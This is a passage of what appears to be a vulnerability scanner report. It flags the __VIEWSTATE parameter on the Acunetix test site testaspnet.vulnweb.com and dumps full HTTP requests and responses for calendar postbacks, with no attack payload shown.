style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1141 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,141 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8446&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDA0JTnDtsIZGRkh%2BOXDuM9d%2FKb%2BZQVVbXY%2BJvc4B0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL23KX8DALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBeYxoNcyGleBTlFDc8vFarXONlqy
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:45 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDA0JTnDtsIZGRkh+OXDuM9d/Kb+ZQVVbXY+Jvc4B0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL23KX8DALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBeYxoNcyGleBTlFDc8vFarXONlqy" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:White" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1141 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,141 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8434&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDA25d5BdsIZGRkdU5iIndUbxZOMVFM8%2BuQn7D2x%2BI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKBmavxDQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBYz%2BidfQxlQHz%2BKVvcg5CYmGTPMe
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:27 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDA25d5BdsIZGRkdU5iIndUbxZOMVFM8+uQn7D2x+I=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKBmavxDQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBYz+idfQxlQHz+KVvcg5CYmGTPMe" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:White" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" 